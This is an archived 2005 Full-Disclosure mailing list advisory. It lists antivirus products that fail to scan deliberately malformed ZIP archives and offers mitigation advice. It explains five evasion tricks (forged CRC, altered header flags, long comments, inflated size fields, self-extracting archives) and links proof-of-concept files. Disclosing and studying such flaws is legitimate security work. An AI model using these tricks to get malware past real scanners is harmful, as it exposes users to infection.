lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <20050316150033.17827.qmail@web31508.mail.mud.yahoo.com>
Date: Wed, 16 Mar 2005 07:00:33 -0800 (PST)
From: bipin gautam <visitbipin@...oo.com>
To: full-disclosure@...ts.grok.org.uk
Cc: vuln@...unia.com, bugtraq@...urityfocus.com
Subject: Re: Av issues


There have been lot of noise and confusion regarding
all the issues reported lately... So, let me sum them
up.
___________________________________________________________________________________
Multiple Vendor Antivirus Products Malformed ZIP
Attachment Scan Evasion Vulnerability

Affected Product:
mks_vir
BitDefender 7.0
AntiVir
DrWeb 4.32b
eTrust-Iris 7.1.194.0
Fortinet 2.51
eTrust-Vet 11.7.0.0
McAfee 4445
Norman 5.70.10
Sybari 7.5.1314
Symantec 8.0
F-Prot 3.16a
Kaspersky
McAfee 4445
( Updated March 16, 2005 6:00 GMT )
 Migration:
For the time being, set filter rules in your AV/email
gateway to filter out archive embedded with
executables (exe, com, pif, scr, cpl  etc)  Block all
type of broken archive and archive with passwds in it.

Description:
1). If you create a zip archive with invalid CRC
checksum...... some AV skip the archive marking it as
clean........ by this way, you can bypass antivirus
gateways and slip in any attachment without scanning
the archive. Moreover, these days.... software tools
automatically repair a *broken* archive.
POC http://www.geocities.com/visitbipin/crc.zip
2). In Local file header if you modify "general
purpose bit flag" 7th & 8'th byte of a zip archive
with \x2f ie: "\"  some AV skip the file marking it as
clean, because the AV come to a false assumption that
zip file is encrypted. This was discovered during the
analysis of "Multiple AV Vendor Incorrect CRC32 Bypass
Vulnerability."

poc: http://www.geocities.com/visitbipin/gpbf.zip

3). If you have a long archive comment... in a zip
archive these AV can't detect virus embedded in it. I
came to know Symantec 8.1 is immune to the bug? 
POC:
http://www.geocities.com/visitbipin/long_coment.zip

4). In the 'local file header" & "data descriptor" if
you change the compressed size and uncompressed size
to greater than the actual file size there are many AV
that can't scan the file properly. 

P0C: http://www.geocities.com/visitbipin/Antigen.zip
<--- try

Moreover there are unzip utilities that goes to a loop
if the file size is changed to ffffffff ! Lets hope,
less popular AV/Trojan scanner out there don't have
such faulty code!
Unzip utilities will successfully extract such archive
with some garbage data \x00 at the end "255 bytes.
(FORGE the crc right, first) The garbage data doesn't
*that matter because any malicious code can execute
without any problem with the garbage at its end. This
will successfully bypass AV detection even for a known
malicious code, "MOST OF THE TIME" if the AV detects
the "SOME" executable comparing total its checksum
instead of analyzing a particular chunk of code in the
code's body. I think its true for some of those old
little (few bytes) viruses. But, modern AV engines in
most cases don't depend on such primitive technique to
detect a virus so it shouldn't be a "that" big issue. 
5). Another 5'th issues... and I'm feeling lazy to
type/describe it now. have a look at,
http://www.securityfocus.com/archive/1/393291
Be noted, 
http://www.geocities.com/visitbipin/test_nav.zip 
...contains a self extracting archive that will
extract the POC named
*.eicar.zip It is better to extract the it from the
exe archive as there are some AV out there that can't
even scan a infected file embedded in a self
extracting zip archive! (O;


Name of vulnerable products were gathered from
feedbacks of the Full-disclosure Mailing list and some
private discussion with others and is believed to be
true.  You can run the file through
 www.virustotal.com , or http://virusscan.jotti.org/
or http://sandbox.norman.no/live_4.html and you'll
know what I'm talking about . Though I understand,
they might be using the CLI engine in most cases (if
not all) while there are other functionalities in a
full AV package that are not in the CLI-based engine.
Thanks, "Pedro Bustamante" for reminding me out. 
Another interesting link, is
http://www.aerasec.de/security/index.html?id=ae-200503-020&lang=en
  Dr. Peter Bieringer's advisory.
Useful Reference:
http://www.pkware.com/company/standards/appnote/

regards,
Bipin Gautam
http://www.geocities.com/visitbipin/


Disclaimer: The information in the advisory is
believed to be accurate at the time of printing based
on currently available information. Use of the
information constitutes acceptance for use in an AS IS
condition. There are no warranties with regard to this
information. Neither the author nor the publisher
accepts any liability for any direct, indirect or
consequential loss or damage arising from use of, or
reliance on this information. 



		
__________________________________ 
Do you Yahoo!? 
Yahoo! Small Business - Try our new resources site!
http://smallbusiness.yahoo.com/resources/ 
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://www.secunia.com/


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ